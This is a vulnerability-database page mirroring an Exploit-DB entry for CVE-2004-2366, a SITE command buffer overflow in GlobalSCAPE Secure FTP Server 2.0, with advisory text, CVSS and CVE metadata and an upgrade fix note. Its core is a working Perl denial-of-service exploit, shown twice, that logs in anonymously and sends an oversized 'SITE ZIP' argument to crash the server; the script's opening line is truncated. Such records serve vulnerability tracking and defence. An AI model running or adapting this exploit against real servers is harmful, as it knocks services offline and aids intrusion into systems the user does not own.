Search...

GlobalSCAPE Secure FTP Server 2.0 Build 03.11.2004.2 SITE Command Remote Buffer Overflow Vulnerability

2004-03-17T00:00:00

ID EDB-ID:23839
Type exploitdb
Reporter storm
Modified 2004-03-17T00:00:00

Description

GlobalSCAPE Secure FTP Server 2.0 Build 03.11.2004.2 SITE Command Remote Buffer Overflow Vulnerability. CVE-2004-2366. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/9904/info

It has been reported that Secure FTP Server may be prone to a remote buffer overflow vulnerability that may allow attackers to execute arbitrary code on a vulnerable system in order to gain unauthorized access. An attacker may cause the buffer overflow condition to occur by sending about 252 bytes of data via a parameter of the SITE Command. Immediate consequences of an attack may result in a denial of service condition. The possibility of remote code execution has not been confirmed at the moment.

Secure FTP Server version 2.0 Build 03.11.2004.2 has been reported to prone to this issue.

e IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET-&gt;new ( Proto =&gt; "tcp", PeerAddr =&gt; $host, PeerPort =&gt; "2117");

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (&lt;$remote&gt;)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}

$remote-&gt;autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (&lt;$remote&gt;)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (&lt;$remote&gt;)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

$ftp = join ("", "SITE ZIP /d:", "A"x(252), "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (&lt;$remote&gt;)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;

JSON Vulners Source

Initial Source

{"id": "EDB-ID:23839", "type": "exploitdb", "bulletinFamily": "exploit", "title": "GlobalSCAPE Secure FTP Server 2.0 Build 03.11.2004.2 SITE Command Remote Buffer Overflow Vulnerability", "description": "GlobalSCAPE Secure FTP Server 2.0 Build 03.11.2004.2 SITE Command Remote Buffer Overflow Vulnerability. CVE-2004-2366. Dos exploit for windows platform", "published": "2004-03-17T00:00:00", "modified": "2004-03-17T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/23839/", "reporter": "storm", "references": [], "cvelist": ["CVE-2004-2366"], "lastseen": "2016-02-02T21:55:25", "viewCount": 4, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-02-02T21:55:25", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-2366"]}, {"type": "osvdb", "idList": ["OSVDB:4332"]}], "modified": "2016-02-02T21:55:25", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://www.exploit-db.com/download/23839/", "sourceData": "source: http://www.securityfocus.com/bid/9904/info\r\n\r\nIt has been reported that Secure FTP Server may be prone to a remote buffer overflow vulnerability that may allow attackers to execute arbitrary code on a vulnerable system in order to gain unauthorized access. An attacker may cause the buffer overflow condition to occur by sending about 252 bytes of data via a parameter of the SITE Command. Immediate consequences of an attack may result in a denial of service condition. The possibility of remote code execution has not been confirmed at the moment.\r\n\r\nSecure FTP Server version 2.0 Build 03.11.2004.2 has been reported to prone to this issue.\r\n\r\ne IO::Socket;\r\n\r\n$host = \"192.168.1.243\";\r\n\r\n$remote = IO::Socket::INET->new ( Proto => \"tcp\", PeerAddr => $host, PeerPort => \"2117\");\r\n\r\nunless ($remote) { die \"cannot connect to ftp daemon on $host\" }\r\n\r\nprint \"connected\\n\";\r\nwhile (<$remote>)\r\n{\r\n print $_;\r\n if (/220 /)\r\n {\r\n last;\r\n }\r\n}\r\n\r\n$remote->autoflush(1);\r\n\r\nmy $ftp = \"USER anonymous\\r\\n\";\r\n\r\nprint $remote $ftp;\r\nprint $ftp;\r\nsleep(1);\r\n\r\nwhile (<$remote>)\r\n{\r\n print $_;\r\n if (/331 /)\r\n {\r\n last;\r\n }\r\n}\r\n\r\n$ftp = join(\"\", \"PASS \", \"a\\@b.com\", \"\\r\\n\");\r\nprint $remote $ftp;\r\nprint $ftp;\r\nsleep(1);\r\n\r\nwhile (<$remote>)\r\n{\r\n print $_;\r\n if (/230 /)\r\n {\r\n last;\r\n }\r\n}\r\n\r\n$ftp = join (\"\", \"SITE ZIP /d:\", \"A\"x(252), \"\\r\\n\");\r\n\r\nprint $remote $ftp;\r\nprint $ftp;\r\nsleep(1);\r\n\r\nwhile (<$remote>)\r\n{\r\n print $_;\r\n if (/250 Done/)\r\n {\r\n last;\r\n }\r\n}\r\n\r\nclose $remote;", "osvdbidlist": ["4332"]}

{"cve": [{"lastseen": "2020-10-03T11:33:41", "description": "Buffer overflow in GlobalSCAPE Secure FTP Server 2.0 B03.11.2004.2 allows remote attackers to cause a denial of service (crash) via a SITE command with a long argument.", "edition": 3, "cvss3": {}, "published": "2004-12-31T05:00:00", "title": "CVE-2004-2366", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-2366"], "modified": "2017-07-11T01:31:00", "cpe": ["cpe:/a:globalscape:secure_ftp_server:2.0_build2004-03-11"], "id": "CVE-2004-2366", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2366", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:globalscape:secure_ftp_server:2.0_build2004-03-11:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:19:58", "bulletinFamily": "software", "cvelist": ["CVE-2004-2366"], "edition": 1, "description": "## Solution Description\nUpgrade to version 2.0 Build 03.16.2004.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor Specific News/Changelog Entry: http://www.globalscape.com/gsftps/history.asp\n[Secunia Advisory ID:11159](https://secuniaresearch.flexerasoftware.com/advisories/11159/)\nISS X-Force ID: 15511\n[CVE-2004-2366](https://vulners.com/cve/CVE-2004-2366)\nBugtraq ID: 9904\n", "modified": "2004-03-18T06:35:05", "published": "2004-03-18T06:35:05", "href": "https://vulners.com/osvdb/OSVDB:4332", "id": "OSVDB:4332", "type": "osvdb", "title": "GlobalSCAPE Secure FTP Server (gsftps) SITE Command Overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}]}